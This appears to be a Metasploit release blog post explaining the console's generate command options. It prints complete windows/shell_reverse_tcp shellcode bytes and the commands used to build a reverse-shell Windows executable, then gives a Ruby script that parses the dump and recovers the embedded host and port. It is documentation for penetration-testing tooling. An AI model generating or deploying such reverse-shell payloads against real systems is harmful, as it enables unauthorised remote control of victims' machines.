Hacker Summer Camp
Last week, the Metasploit team flew out to sunny, hot, and dry Las Vegas for Hacker Summer Camp (Black Hat, BSidesLV, and DEF CON). It was a full week of epic hacks, good conversation, and even a little business!
If you managed to catch us at our Open Source Office Hours (previously OSSM, the Open Source Security Meetup) in Bally's, we just wanted to say thanks for making the trek through the Las Vegas sun to come see us!
In between Vegas and the Exploit That Shall Not Be Named, we've been steadily at work enhancing modules and the console, and fixing bugs for msfvenom in my
Back in June of last year, we aligned the options for the generate command with msfvenom's options. Since the change was subtle and may not have been picked up by the various tutorials on the Net, here is a quick recap of how to use the new-ish options.
If you're on Metasploit 5, please continue reading! If not, you can continue to use the old invocation. :-)
Run help generate to see the new usage for the generate command:

```
msf5 payload(windows/shell_reverse_tcp) > help generate
Usage: generate [options]

Generates a payload. Datastore options may be supplied after normal options.

Example: generate -f python LHOST=127.0.0.1

OPTIONS:

    -E        Force encoding
    -O <opt>  Deprecated: alias for the '-o' option
    -P <opt>  Total desired payload size, auto-produce appropriate NOP sled length
    -S <opt>  The new section name to use when generating (large) Windows binaries
    -b <opt>  The list of characters to avoid example: '\x00\xff'
    -e <opt>  The encoder to use
    -f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h        Show this message
    -i <opt>  The number of times to encode the payload
    -k        Preserve the template behavior and inject the payload as a new thread
    -n <opt>  Prepend a nopsled of [length] size on to the payload
    -o <opt>  The output file name (otherwise stdout)
    -p <opt>  The platform of the payload
    -x <opt>  Specify a custom executable file to use as a template

msf5 payload(windows/shell_reverse_tcp) >
```
Following the example in the usage, to specify datastore options in your generate command, simply append them to the command line after the normal options:

```
msf5 payload(windows/shell_reverse_tcp) > generate -f python LHOST=127.0.0.1
# windows/shell_reverse_tcp - 324 bytes
# https://metasploit.com/
# VERBOSE=true, LHOST=127.0.0.1, LPORT=4444,
# ReverseAllowProxy=false, ReverseListenerThreaded=false,
# StagerRetryCount=10, StagerRetryWait=5,
# PrependMigrate=false, EXITFUNC=process, CreateSession=true
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68"
buf += "\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
buf += "\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
buf += "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
buf += "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
buf += "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
buf += "\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
buf += "\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
buf += "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
buf += "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
msf5 payload(windows/shell_reverse_tcp) >
```
What's even cooler is that generate will remember the datastore options you gave it, allowing you to invoke it again with different options, such as writing the payload to a file.
Here we demo writing the payload windows/shell_reverse_tcp to the file shell_reverse_tcp.exe without having to set

```
msf5 payload(windows/shell_reverse_tcp) > options

Module options (payload/windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

msf5 payload(windows/shell_reverse_tcp) > generate -f exe-only -o shell_reverse_tcp.exe
[*] Writing 73802 bytes to shell_reverse_tcp.exe...
msf5 payload(windows/shell_reverse_tcp) > file shell_reverse_tcp.exe
[*] exec: file shell_reverse_tcp.exe

shell_reverse_tcp.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf5 payload(windows/shell_reverse_tcp) >
```
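Once you are generating payloads from the console this way, it is worth confirming that the options you passed actually ended up in the bytes. The Ruby script below is an example added for this post, not Metasploit code: it parses the python-format dump shown above, checks the byte count against the "324 bytes" header, reports any bytes from a -b list that survive (expected on an unencoded payload, which is exactly what -b together with an encoder is for), and recovers the LHOST/LPORT that the unencoded x86 reverse_tcp stub pushes onto the stack. The helper names, the check_payload report layout, and the push-immediate pattern used to locate the sockaddr are assumptions of this example; SAMPLE_DUMP is the generate output reproduced from above.

```ruby
# Sanity checks over a payload dumped with `generate -f python`. Added example
# for this post, not Metasploit code; the helper names below are made up here.
# SAMPLE_DUMP is the windows/shell_reverse_tcp output shown earlier in the post.
SAMPLE_DUMP = <<~'PY'
  # windows/shell_reverse_tcp - 324 bytes
  # https://metasploit.com/
  # VERBOSE=true, LHOST=127.0.0.1, LPORT=4444,
  # ReverseAllowProxy=false, ReverseListenerThreaded=false,
  # StagerRetryCount=10, StagerRetryWait=5,
  # PrependMigrate=false, EXITFUNC=process, CreateSession=true
  buf =  ""
  buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
  buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
  buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
  buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
  buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
  buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
  buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
  buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
  buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
  buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
  buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
  buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
  buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
  buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
  buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68"
  buf += "\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
  buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
  buf += "\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
  buf += "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
  buf += "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
  buf += "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
  buf += "\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
  buf += "\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
  buf += "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
  buf += "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
PY

# Parse the python-format dump: module name and declared size from the first
# comment line, the datastore options echoed in the header comments, and the
# raw bytes from every `buf += "..."` line.
def parse_python_dump(text)
  header = text.match(/^#\s*(\S+)\s+-\s+(\d+)\s+bytes/)
  raise ArgumentError, 'no "<module> - N bytes" header found' unless header
  options = text.scan(/^#.*$/).join(' ').scan(/(\w+)=([^,\s]+)/).to_h
  hex = text.scan(/buf \+= "((?:\\x[0-9a-f]{2})+)"/i).flatten.join
  bytes = hex.scan(/\\x([0-9a-f]{2})/i).flatten.map { |h| h.to_i(16) }.pack('C*')
  { name: header[1], declared_size: header[2].to_i, options: options, bytes: bytes }
end

# Bytes from a -b list that still occur in the payload, e.g. [0, 255] for
# "\x00\xff". Non-empty on an unencoded payload is normal; -b plus an encoder
# is what removes them.
def bad_bytes_present(payload, badchars)
  (payload.bytes & badchars.bytes).sort
end

# Recover LHOST/LPORT from an unencoded x86 reverse_tcp stub. Assumption of
# this example: the stub does `push <ipv4>` followed by `push 0x5c110002`-style
# AF_INET + port (network byte order), as seen in the dump above. Anything
# encoded or built differently will not match and returns nil.
def reverse_tcp_target(payload)
  m = payload.b.match(/\x68(.{4})\x68\x02\x00(.{2})/mn)
  return nil unless m
  { lhost: m[1].unpack('C4').join('.'), lport: m[2].unpack('n').first }
end

# One report over a dump: does the byte count match the header, which -b bytes
# survived, and which target is embedded. Report keys are this example's own.
def check_payload(text, badchars: '')
  parsed = parse_python_dump(text)
  {
    name: parsed[:name],
    options: parsed[:options],
    size_ok: parsed[:bytes].bytesize == parsed[:declared_size],
    bad_bytes: bad_bytes_present(parsed[:bytes], badchars),
    target: reverse_tcp_target(parsed[:bytes])
  }
end

if __FILE__ == $PROGRAM_NAME
  report = check_payload(SAMPLE_DUMP, badchars: "\x00\xff")
  puts "#{report[:name]}: #{report[:size_ok] ? 'size matches header' : 'SIZE MISMATCH'}"
  leftovers = report[:bad_bytes].map { |b| format('\\x%02x', b) }.join
  puts "bytes from -b list still present: #{leftovers.empty? ? 'none' : leftovers}"
  puts "embedded LHOST/LPORT: #{report[:target][:lhost]}:#{report[:target][:lport]}" if report[:target]
end
```

Run it as a plain Ruby script; it needs nothing from the framework. A mismatch between the recovered target and the LHOST/LPORT echoed in the header comment would mean the datastore value you passed on the generate line did not take effect, and a non-empty bad-byte list on a payload you believed was encoded means the encoder did not run.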
We hope you find these changes useful. Happy hacking!
Enhancements and features
- PR #12161 - The linux/gather/hashdump module has been updated to gather password history information from
- PR #12202 - This adds the needs_cleanup attribute to post modules, fixing a crash when the attribute is used (such as in FileDropper) without being available.
- PR #12199 - This replaces a backtrace with a friendly error message when the user specifies an invalid value for RHOSTS in an exploit module.
- PR #12198 - This restores functionality from Metasploit 4 and earlier where payload-specific options to the generate command can be passed with -o. For parity with the msfvenom command, however, prefer simply specifying options directly with Metasploit 5 and later.
- PR #12188 - This fixes tools/modules/module_author.rb to use the renamed
As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:
We recently announced the release of Metasploit 5. You can get it by cloning the Metasploit Framework repo (master branch). To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial editions).